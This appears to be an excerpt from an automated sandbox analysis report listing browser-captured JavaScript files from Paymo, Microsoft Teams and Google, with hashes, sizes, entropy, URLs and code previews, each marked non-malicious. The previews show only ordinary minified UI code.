                                MD5:8A25F5F3044BBAB1565D76EF2B8E44EB
                                SHA1:FCB0D5044814AE1A3E64C94481F8392D3C5DED7D
                                SHA-256:040C9098942F1B158DB94F6865DA65A256630CF5A0968DC8A869DD0F33AA09F6
                                SHA-512:FCECCBB7B60E311FEC3B87249D3291067BA2534ED09C9F9C0A021A3003CB7F0532CA74D73FE69F8C8F214816F7DED6F077159C06D61EA43D5071AC6DC9755EE2
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/accounting/3.182.65/paid-bfac7e4a.js
                                Preview:System.register(["react"],(function(e,c){"use strict";var t;return{setters:[e=>{t=e}],execute:function(){e("S",(e=>t.createElement("svg",{width:"1em",height:"1em",viewBox:"0 0 14 14",xmlns:"http://www.w3.org/2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",xmlSpace:"preserve","xmlns:serif":"http://www.serif.com/",style:{fillRule:"evenodd",clipRule:"evenodd",strokeLinejoin:"round",strokeMiterlimit:2},...e},t.createElement("path",{d:"M7,0c3.863,0 7,3.137 7,7c0,3.863 -3.137,7 -7,7c-3.863,0 -7,-3.137 -7,-7c0,-3.863 3.137,-7 7,-7Zm0,1c3.311,0 6,2.689 6,6c0,3.311 -2.689,6 -6,6c-3.311,0 -6,-2.689 -6,-6c0,-3.311 2.689,-6 6,-6Zm0.5,2.5c1.104,0 2,0.896 2,2l-1,0c0,-0.552 -0.448,-1 -1,-1l-1,0c-0.552,0 -1,0.448 -1,1c-0,0.552 0.448,1 1,1l1,0c1.104,0 2,0.896 2,2c0,1.104 -0.896,2 -2,2l0,1l-1,0l0,-1c-1.104,-0 -2,-0.896 -2,-2l1,0c-0,0.552 0.448,1 1,1l1,0c0.552,-0 1,-0.448 1,-1c0,-0.552 -0.448,-1 -1,-1l-1,0c-1.104,0 -2,-0.896 -2,-2c-0,-1.104 0.896,-2 2,-2l0,-1l1,0l0,1Z"}))))}}}));.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19951)
                                Category:downloaded
                                Size (bytes):20058
                                Entropy (8bit):5.301484485075663
                                Encrypted:false
                                SSDEEP:
                                MD5:34407BE2AFA1792CDB44C58E48ABFB23
                                SHA1:C9AC25CF2AB6163F1C8288A3E32E669785CD4021
                                SHA-256:F766D7CA6D6CBC1572B1DA8B46566A26B1BAFC66487193886FC2CD9190E42944
                                SHA-512:570FD69E553A4E228D9DC003A204F91D183A9801AB0EE9A99D696B1E7808B31F312453DA26704A36D794BD84E7A834BFD36C3A6E5DFD7C63F4E128DE9A2821A3
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/19528-b6fec175b219cd79.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[19528],{408501:r=>{r.exports=function(r,t,n){switch(n.length){case 0:return r.call(t);case 1:return r.call(t,n[0]);case 2:return r.call(t,n[0],n[1]);case 3:return r.call(t,n[0],n[1],n[2])}return r.apply(t,n)}},816349:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length;++n<e&&!1!==t(r[n],n,r););return r}},44953:(r,t,n)=>{var e=n(939767);r.exports=function(r,t){return!!(null==r?0:r.length)&&e(r,t,0)>-1}},875597:r=>{r.exports=function(r,t,n){for(var e=-1,o=null==r?0:r.length;++e<o;)if(n(t,r[e]))return!0;return!1}},816920:r=>{r.exports=function(r,t){for(var n=-1,e=null==r?0:r.length,o=Array(e);++n<e;)o[n]=t(r[n],n,r);return o}},698078:r=>{r.exports=function(r){return r.split("")}},907001:(r,t,n)=>{var e=n(314172),o=n(484636);r.exports=function(r,t,n){(void 0!==n&&!o(r[t],n)||void 0===n&&!(t in r))&&e(r,t,n)}},872791:(r,t,n)=>{var e=n(314172),o=n(484636),u=Object.prototype.hasOwnProp
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (43863)
                                Category:dropped
                                Size (bytes):43971
                                Entropy (8bit):5.219897273461165
                                Encrypted:false
                                SSDEEP:
                                MD5:AADD07657CFD0C9AC39F067D6AA88900
                                SHA1:0A829E66BE650CF343D705B4022A6F605FAF9928
                                SHA-256:8CBEF87A094C8C473ACE6DE5897EB9E4B524EDBDAB60F4EE5447C6B06C34DE37
                                SHA-512:FAEA6697A8DBDE2D51604DCE7E1C8564D300CC60B397A7D8B5C63A736DBF6ADC2290B9B4EE51FA93EA6A072A61F78E4C33766E52B8C7AFC0A48B114F2AECF343
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[137137],{414250:(e,t,l)=>{l.d(t,{g:()=>C});var a=l(513432),C=(0,l(485529).Ke)({svg:function(e){var t=e.classes;return a.createElement("svg",{role:"presentation",focusable:"false",viewBox:"0 0 32 32",className:t.svg},a.createElement("path",{d:"M9.5 29H28.5C28.775 29 29 28.775 29 28.5V9H24.5C23.673 9 23 8.327 23 7.5V3H9.5C9.225 3 9 3.225 9 3.5V28.5C9 28.775 9.225 29 9.5 29Z",fill:"white"}),a.createElement("path",{d:"M28.293 8.00003L24 3.70703V7.50003C24 7.77503 24.225 8.00003 24.5 8.00003H28.293Z",fill:"white"}),a.createElement("path",{opacity:"0.64",fillRule:"evenodd",clipRule:"evenodd",d:"M29.56 7.854L24.146 2.439C23.8642 2.15891 23.4833 2.00117 23.086 2H9.5C8.673 2 8 2.673 8 3.5V28.5C8 29.327 8.673 30 9.5 30H28.5C29.327 30 30 29.327 30 28.5V8.914C30 8.514 29.844 8.137 29.56 7.854ZM24 3.707L28.293 8H24.5C24.2241 7.99945 24.0005 7.77591 24 7.5V3.707ZM9.5 29H28.5C28.775 29 29 2
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (9167)
                                Category:downloaded
                                Size (bytes):9275
                                Entropy (8bit):4.510710251595788
                                Encrypted:false
                                SSDEEP:
                                MD5:2EB77E310EAEE79E0D7C1355B3BEFF5B
                                SHA1:8B3A438962114E5815D13018AAA04000BA6EE69F
                                SHA-256:957483AE90B62F6E44072EB51C20E693A5B6B57CC34D763AFA3EB42A658B9DFD
                                SHA-512:98F3F4ADCA9FA49812B538747644A105C1AC1DFCF9FFD120BB7B5772FC6F0917B4FCD87C76FBFC8289DABE77385A62CD5E3F0B0E2E9902BD35E0F8DE163C72A9
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/698386-08e4f521fff06ec5.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[698386],{698386:(a,l,Z)=>{Z.d(l,{aRN:()=>c,c8N:()=>v,WXH:()=>h,g0L:()=>H,NL$:()=>e,vrP:()=>m,vNW:()=>A,fEx:()=>V,faZ:()=>L,$8m:()=>i,N6m:()=>U,gMM:()=>o,k8t:()=>r,uJg:()=>u,lnn:()=>n,dAI:()=>g,Tv4:()=>t,$b4:()=>R,lDF:()=>d,OEH:()=>k,uwA:()=>s,CSI:()=>I,iCA:()=>C,IJL:()=>F,GOF:()=>f,ozV:()=>p});var M=Z(693935);const c=(0,M.U)("Info12Filled","12",["M11 6A5 5 0 1 1 1 6a5 5 0 0 1 10 0Zm-5.5.5V8a.5.5 0 0 0 1 0V6.5a.5.5 0 0 0-1 0ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"]),v=(0,M.U)("Info12Regular","12",["M5.5 6.5a.5.5 0 0 1 1 0V8a.5.5 0 0 1-1 0V6.5ZM6 3.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM1 6a5 5 0 1 1 10 0A5 5 0 0 1 1 6Zm5-4a4 4 0 1 0 0 8 4 4 0 0 0 0-8Z"]),h=(0,M.U)("Info16Filled","16",["M8 1a7 7 0 1 1 0 14A7 7 0 0 1 8 1Zm0 5.25a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm.5 1.25a.5.5 0 0 0-1 0v3a.5.5 0 0 0 1 0v-3Z"]),H=(0,M.U)("Info16Regular","16",["M8.5 7.5a.5.5 0 1 0-1 0v3
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (53670)
                                Category:dropped
                                Size (bytes):53798
                                Entropy (8bit):5.230039416671407
                                Encrypted:false
                                SSDEEP:
                                MD5:4305A98733CD8A3B3F365BDEEECF0249
                                SHA1:D62D1C89267292689AD19BAF36141BD68505FABF
                                SHA-256:5475C34EA8E2478D7C44EF365C2F476DC80C26DDEA2099A13006AD383F35A523
                                SHA-512:65FA7A5E8DE9BF97FC0E366E768B877C2F9A85D5780ED18341B6AF878D5E9B0DDAE058F58A0291C731A9492FEA40DB463B22952D1B2D0B71E9DF0A1DC228AB0D
                                Malicious:false
                                Reputation:unknown
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[420340],{944244:e=>{"use strict";var t=function(e){return function(e){return!!e&&"object"==typeof e}(e)&&!function(e){var t=Object.prototype.toString.call(e);return"[object RegExp]"===t||"[object Date]"===t||function(e){return e.$$typeof===s}(e)}(e)};var s="function"==typeof Symbol&&Symbol.for?Symbol.for("react.element"):60103;function r(e,t){return!1!==t.clone&&t.isMergeableObject(e)?a((s=e,Array.isArray(s)?[]:{}),e,t):e;var s}function i(e,t,s){return e.concat(t).map((function(e){return r(e,s)}))}function n(e){return Object.keys(e).concat(function(e){return Object.getOwnPropertySymbols?Object.getOwnPropertySymbols(e).filter((function(t){return Object.propertyIsEnumerable.call(e,t)})):[]}(e))}function o(e,t){try{return t in e}catch(e){return!1}}function l(e,t,s){var i={};return s.isMergeableObject(e)&&n(e).forEach((function(t){i[t]=r(e[t],s)})),n(t).forEach((function(n){(function(e,t){ret
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (47805)
                                Category:dropped
                                Size (bytes):47913
                                Entropy (8bit):5.382366921986537
                                Encrypted:false
                                SSDEEP:
                                MD5:334DDD74DD7F780C7829E4EAC83CDFF6
                                SHA1:0993A41A48093AFCB5F82C25F43AE6A7279EC815
                                SHA-256:7742AE0803C92EEEDCA7F31AE73A7CAF0D53AEE1A5553FCF633414B1D1AE22CE
                                SHA-512:8D863E8319BD9B583C767104A8DD88B846D0B8D01892C7D3DBC3CA7FBBB5BF026F17CBB83767FBD4B183AE555C74B3F141C86519AF9B2AAB3A9ED1FB45E6D0C1
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[192699],{504405:(e,t,n)=>{n.d(t,{P:()=>r,C:()=>o});var r="data-is-focusable",o="data-disable-click-on-enter"},888846:(e,t,n)=>{n.d(t,{l:()=>r,E:()=>o});var r=function(e){return e[e.none=0]="none",e[e.all=1]="all",e[e.inputOnly=2]="inputOnly",e}({}),o=function(e){return e[e.vertical=0]="vertical",e[e.horizontal=1]="horizontal",e[e.bidirectional=2]="bidirectional",e[e.bidirectionalDomOrder=3]="bidirectionalDomOrder",e}({})},953543:(e,t,n)=>{n.d(t,{kR:()=>f,ZG:()=>c,QC:()=>i,rC:()=>s});var r={3:"Cancel",6:"Help",8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",28:"Convert",29:"NonConvert",30:"Accept",31:"ModeChange",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",41:"Select",42:"Print",43:"Execute",44:"PrintScreen",45:"Insert",46:"Delete",48:["0",")"],4
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (30489)
                                Category:dropped
                                Size (bytes):30597
                                Entropy (8bit):5.36114233090183
                                Encrypted:false
                                SSDEEP:
                                MD5:B34B6A1930919E2D8AD388FEA65E6E64
                                SHA1:F43E4975CFE5BEA3EB9298FEBC37BCB333582026
                                SHA-256:97E8A6EA62E0062C54C0D755509DD5F9ACF2C4C41297170AC361EDF1FD882D43
                                SHA-512:2B0C9CF798816C5ECDD5CF056130EAA4ED4D5AA4C92A341A43C35B788EEF9C0FFC3C876C28A9D96A97BA6FE1C96A7FAF403B95C69665CF6D578C28F2A02676AE
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[233940],{626388:(e,t,r)=>{var n;function o(e){return!!e&&e<7}r.d(t,{p:()=>n,b:()=>o}),function(e){e[e.loading=1]="loading",e[e.setVariables=2]="setVariables",e[e.fetchMore=3]="fetchMore",e[e.refetch=4]="refetch",e[e.poll=6]="poll",e[e.ready=7]="ready",e[e.error=8]="error"}(n||(n={}))},422816:(e,t,r)=>{r.d(t,{M:()=>i,K:()=>s});var n=r(383851),o=(r(360418),r(852965));function i(e){return e.hasOwnProperty("graphQLErrors")}var s=function(e){function t(r){var n,i,s=r.graphQLErrors,a=r.clientErrors,c=r.networkError,u=r.errorMessage,l=r.extraInfo,d=e.call(this,u)||this;return d.graphQLErrors=s||[],d.clientErrors=a||[],d.networkError=c||null,d.message=u||(n=d,i="",((0,o.E)(n.graphQLErrors)||(0,o.E)(n.clientErrors))&&(n.graphQLErrors||[]).concat(n.clientErrors||[]).forEach((function(e){var t=e?e.message:"Error message not found.";i+="".concat(t,"\n")})),n.networkError&&(i+="".concat(n
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (41662)
                                Category:downloaded
                                Size (bytes):41778
                                Entropy (8bit):5.360363617158387
                                Encrypted:false
                                SSDEEP:
                                MD5:38B448E73F0207EDB8A49DA72943D515
                                SHA1:4B761C3BD552A524946DDEBEF41D392E4606EC14
                                SHA-256:019D358A1E21F5B6F1FDE5482EEEF12051D85E374A48A35559108FC1FD3920F1
                                SHA-512:2F5F3245B57FCAFC06A3CA95D068A60A28A94861A821B3E1DADC3EA6D3C134F0B6BF472B27683D01F66DB53BB921C3D6D318029D3865CC7E74808E254D028D2C
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/204348-6c2a726c296c1d1e.js
                                Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[204348],{941974:t=>{t.exports=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},t.exports.__esModule=!0,t.exports.default=t.exports},749712:t=>{function e(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}t.exports=function(t,i,n){return i&&e(t.prototype,i),n&&e(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t},t.exports.__esModule=!0,t.exports.default=t.exports},238752:t=>{t.exports=function(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t},t.exports.__esModule=!0,t.exports.default=t.exports},434192:(t,e,i)=>{var n=i(71012);t.exports=function(t,e){if(null==t)return{};var i,r,o=n(t,e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(t);for(r=0;r<s.length;r+
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (33656)
                                Category:downloaded
                                Size (bytes):33764
                                Entropy (8bit):5.60156438987075
                                Encrypted:false
                                SSDEEP:
                                MD5:D010EF6AEC4927AB3BB5049C00D70842
                                SHA1:9D23110792583AAF46063E62006CFF812A81549A
                                SHA-256:9FF10088E9376E32B8657F7B51092829F068D89B65B8AF472AF59C87A82DD68A
                                SHA-512:243BE3C3E79BE17165A2B7561E8534997DD57B9B04E314544965378CA1BC4E01F0BDFA8A5AD63C3F67D7F2DD724F775ABDD55B0D9F082FDFD5969C5514854081
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/900516-ca863ef1d4e5aa90.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900516],{111631:(e,t,r)=>{function i(e,t){var r=t&&t.cache?t.cache:l,i=t&&t.serializer?t.serializer:u;return(t&&t.strategy?t.strategy:a)(e,{cache:r,serializer:i})}function n(e,t,r,i){var n,s=null==(n=i)||"number"==typeof n||"boolean"==typeof n?i:r(i),o=t.get(s);return void 0===o&&(o=e.call(this,i),t.set(s,o)),o}function s(e,t,r){var i=Array.prototype.slice.call(arguments,3),n=r(i),s=t.get(n);return void 0===s&&(s=e.apply(this,i),t.set(n,s)),s}function o(e,t,r,i,n){return r.bind(t,e,i,n)}function a(e,t){return o(e,this,1===e.length?n:s,t.cache.create(),t.serializer)}r.d(t,{A:()=>i,W:()=>h});var u=function(){return JSON.stringify(arguments)};function c(){this.cache=Object.create(null)}c.prototype.get=function(e){return this.cache[e]},c.prototype.set=function(e,t){this.cache[e]=t};var l={create:function(){return new c}},h={variadic:function(e,t){return o(e,this,s,t.cache.create(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65531)
                                Category:downloaded
                                Size (bytes):132723
                                Entropy (8bit):5.436507934014413
                                Encrypted:false
                                SSDEEP:
                                MD5:E6D877457D6C4387EF66CC97F259C30B
                                SHA1:2EE9B2078B5A7D00FCCE21847939CF03D2CB5D30
                                SHA-256:A514A1A871A43CA66910212320C2E0B060A9A6C37FE56DF8C6D4D676AEFE62C5
                                SHA-512:DA21C78D2CE15163E27638CD482B6FAADF50868DC5C9A5ED4853CF7CC687F82F7E0857A101AD4847B835BDF94DCF012FC2ED948CD2A9C200BD73227BEFE54322
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (36879)
                                Category:dropped
                                Size (bytes):36987
                                Entropy (8bit):5.379410624740036
                                Encrypted:false
                                SSDEEP:
                                MD5:EABD9EE763EBBE8CC6821242AD8968B7
                                SHA1:B70611C7EDBC1D933213EA7BF9A84A957F797CB4
                                SHA-256:D483B2A08866685564D04498B99A02C03D2A2690F4F2A03E78E062AA761FD44B
                                SHA-512:5004261B5BF175EBAD0D50C794957AFD8FAE1E92B86D4BAF8B48BEB0C540FBE62FA36A7348B0ECA2C40457FAEFBB4AC8F7ABC2C42CCDC7D1D4DE8EBD658B7740
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[602438],{562341:(e,t,n)=>{n.d(t,{V:()=>r});var o=n(953543),r=function(e){return{attributes:{root:{role:"button"===e.as?void 0:"button",tabIndex:"button"===e.as||e.disabled?void 0:0,disabled:"button"===e.as?e.disabled:void 0,"aria-disabled":e.disabledFocusable}},keyActions:{root:Object.assign({},"button"!==e.as&&"a"!==e.as&&{performClick:{keyCombinations:[{keyCode:o.rC.Enter},{keyCode:o.ZG}]}})}}}},928879:(e,t,n)=>{n.d(t,{Z:()=>c});var o=n(55543),r=n.n(o),i=n(666293),a=n.n(i),s=n(953543),c=function(e){var t,n,o=a()(e.on)?e.on:[e.on],i=e.tabbableTrigger?{tabIndex:u("tabIndex",e,0)}:void 0;i&&(i["aria-haspopup"]=null!=(t=e.trigger)&&t.props.hasOwnProperty("aria-haspopup")?null==(n=e.trigger)?void 0:n.props["aria-haspopup"]:"dialog");return{attributes:{trigger:Object.assign({},i),popup:{role:e.trapFocus?"dialog":e.inline?void 0:"complementary","aria-modal":!!e.trapFocus||void 0,"
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (14156)
                                Category:dropped
                                Size (bytes):14264
                                Entropy (8bit):5.4947284760221144
                                Encrypted:false
                                SSDEEP:
                                MD5:256ED7E30F9976F4FEEB07EFC1F550B9
                                SHA1:4C46E9AEB09277E67CD9E58BE8420CA8E731136D
                                SHA-256:2B963A7C1BFB48794672A34F7FE9FFFD06A05BE6C11C32D1BB7012F15116442C
                                SHA-512:AC6BC58C03C1E8CBED4B283D07B11CBC3B774BDF915F7DF8D9EBD7BCC70EB0FD71DE80009F24CC442255F5EB55BCDD2CA1FACFDE3006B708E194DE7514696273
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[224109],{263821:(e,t,o)=>{o.d(t,{R:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogBody",u=(0,i.D)("r1h3qql9",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},root:l.Gk((0,a.g)(null!==(o=e.as)&&void 0!==o?o:"div",{ref:t,...e}),{elementType:"div"})}})(e,t);return(e=>{const t=u();e.root.className=(0,c.z)(f,t,e.root.className)})(o),(0,d.useCustomStyleHook_unstable)("useDialogBodyStyles_unstable")(o),(e=>((0,s.C)(e),(0,r.Y)(e.root,{})))(o)}));m.displayName="DialogBody"},951195:(e,t,o)=>{o.d(t,{C:()=>m});var n=o(513432),l=o(164093),a=o(250452);var r=o(644525),s=o(854130);var i=o(103735),c=o(526521);const f="fui-DialogContent",u=(0,i.D)("r1v5zwsm",null);var d=o(35871);const m=n.forwardRef(((e,t)=>{const o=((e,t)=>{var o;return{components:{root:"div"},ro
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (16052)
                                Category:dropped
                                Size (bytes):16159
                                Entropy (8bit):5.403213464045788
                                Encrypted:false
                                SSDEEP:
                                MD5:4081724B2479E5E968A58A0682ECE8EB
                                SHA1:449F3DC38DA9CB1826064CC92CCA171D05D4527B
                                SHA-256:4EF6E1959E07EF11CA16E74EDD46384665C5AFFA72A8D8F2BDFDC1F19FB0566F
                                SHA-512:7942E3A9D9D45F6C6268040756632D9EA6D6C172245CF8170591E37B465C8F85927795BB5223806B319B575F78F4C294DEBBCC533B5EE37B6ABF75BADA163239
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[61875],{437932:(e,t,n)=>{n.d(t,{T:()=>$});var o=n(598166),r=n(35871),i=n(70410),a=n(602835),l=n(716300),s=n(513432);function c(e,t,n){const o=s.useRef(!0),[r]=s.useState((()=>({value:e,callback:t,facade:{get current(){return r.value},set current(e){const t=r.value;if(t!==e){if(r.value=e,n&&o.current)return;r.callback(e,t)}}}})));return(0,l.E)((()=>{o.current=!1}),[]),r.callback=t,r.facade}const u=e=>{switch(e){case"always":case!0:return{applyMaxWidth:!0,applyMaxHeight:!0};case"width-always":case"width":return{applyMaxWidth:!0,applyMaxHeight:!1};case"height-always":case"height":return{applyMaxWidth:!1,applyMaxHeight:!0};default:return!1}},d=e=>{const t=e&&(e=>"HTML"===e.nodeName?e:e.parentNode||e.host)(e);if(!t)return document.body;switch(t.nodeName){case"HTML":case"BODY":return t.ownerDocument.body;case"#document":return t.body}const{overflow:n,overflowX:o,overflowY:r}=(e=>{v
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (26062)
                                Category:dropped
                                Size (bytes):26168
                                Entropy (8bit):5.296571517037529
                                Encrypted:false
                                SSDEEP:
                                MD5:A46EFC647DE93EE6A18BD892F4A95BB2
                                SHA1:4FFD23C55B16482BE0AE5A545C0977EC7AC78143
                                SHA-256:2968994431F249465FF67033C9A9A43132B38FE0B982ED7CCF4AF39909604BD6
                                SHA-512:CCA8C183453DDC9D52E1A104248AAA563A988CAEAAEEA4587454E14D45770ED8CA7F878D6177B4E66F18E0ED284127EC73C3C0842E2843ABD9CC547C6BF9C781
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[7747],{799323:(e,n,t)=>{t.d(n,{x:()=>a});var r=t(513432),o=function(e){return void 0===e},a=function(e){var n=r.useState(o(e.defaultValue)?e.initialValue:e.defaultValue),t=n[0],a=n[1],i=o(e.value)?t:e.value,l=r.useRef(i);r.useEffect((function(){l.current=i}),[i]);var s=r.useCallback((function(e){l.current="function"==typeof e?e(l.current):e,a(l.current)}),[]);return[i,s]}},783943:(e,n,t)=>{t.d(n,{D:()=>a});var r=t(513432),o=t(338400),a=function(e){var n=r.useRef((function(){throw new Error("Cannot call an event handler while rendering")}));return(0,o.E)((function(){n.current=e}),[e]),r.useCallback((function(){return n.current.apply(void 0,arguments)}),[n])}},182812:(e,n,t)=>{t.d(n,{a:()=>o});var r=t(513432);function o(){for(var e=arguments.length,n=new Array(e),t=0;t<e;t++)n[t]=arguments[t];var o=r.useCallback((function(e){o.current=e;for(var t=0,r=n;t<r.length;t++){var a=r[t
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (32495)
                                Category:dropped
                                Size (bytes):59691
                                Entropy (8bit):5.498196140406729
                                Encrypted:false
                                SSDEEP:
                                MD5:63C321E5E6A597A40B456924C554DDBF
                                SHA1:C3CBF612B21E12D36B7A3ED0BEF627F755DFC709
                                SHA-256:138C77526917A87AFC6A57CBF9D463CBD1886BF6823C04B32E6C261D6D1688EC
                                SHA-512:EB7289E539973E80AECD624B979B24CDFBD95B9314DD5157F2372DB2823CBFC9A2BE1099D351EEBA970C797EDBF6535EE8A5834AF7DD5DDB7E1CC64831E34267
                                Malicious:false
                                Reputation:unknown
                                Preview:System.register(["../form-45be5755.js","../_commonjsHelpers-6226bf47.js","react"],function(it,Yd){"use strict";var me,ut,ot,W,j;return{setters:[O=>{me=O.g,ut=O.s,ot=O.a},O=>{W=O.c,j=O.a},null],execute:function(){var O=function(t,e,r){if(t&&"reportValidity"in t){var n=me(r,e);t.setCustomValidity(n&&n.message||""),t.reportValidity()}},lt=function(t,e){var r=function(a){var s=e.fields[a];s&&s.ref&&"reportValidity"in s.ref?O(s.ref,a,t):s.refs&&s.refs.forEach(function(i){return O(i,a,t)})};for(var n in e.fields)r(n)},rn=function(t,e){e.shouldUseNativeValidation&&lt(t,e);var r={};for(var n in t){var a=me(e.fields,n);ut(r,n,Object.assign(t[n],{ref:a&&a.ref}))}return r},Jd=it("yupResolver",function(t,e,r){return e===void 0&&(e={}),r===void 0&&(r={}),function(n,a,s){try{return Promise.resolve(function(i,u){try{var o=(e.context,Promise.resolve(t[r.mode==="sync"?"validateSync":"validate"](n,Object.assign({abortEarly:!1},e,{context:a}))).then(function(l){return s.shouldUseNativeValidation&&lt({},s
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (16060)
                                Category:downloaded
                                Size (bytes):1482026
                                Entropy (8bit):5.512142958305248
                                Encrypted:false
                                SSDEEP:
                                MD5:A87E32FB149B873958F57E3D3A524A2E
                                SHA1:D350AF665D85836DED5498EB8DD1569767AA7530
                                SHA-256:FA362FA6823A7E7CEC81D0B41FBCCE58D91BCE171EC9CC43736037C0A758DD38
                                SHA-512:B39184E445DD1A6A16159D92E13284772D475716BE30AD27EB952A0A53DF25F020C5B89DA39CBB7E33BFB5650FC8B6C2EB327C6FD5416B62756E0A836D6CB72D
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/lists/3.182.65/system/index.js
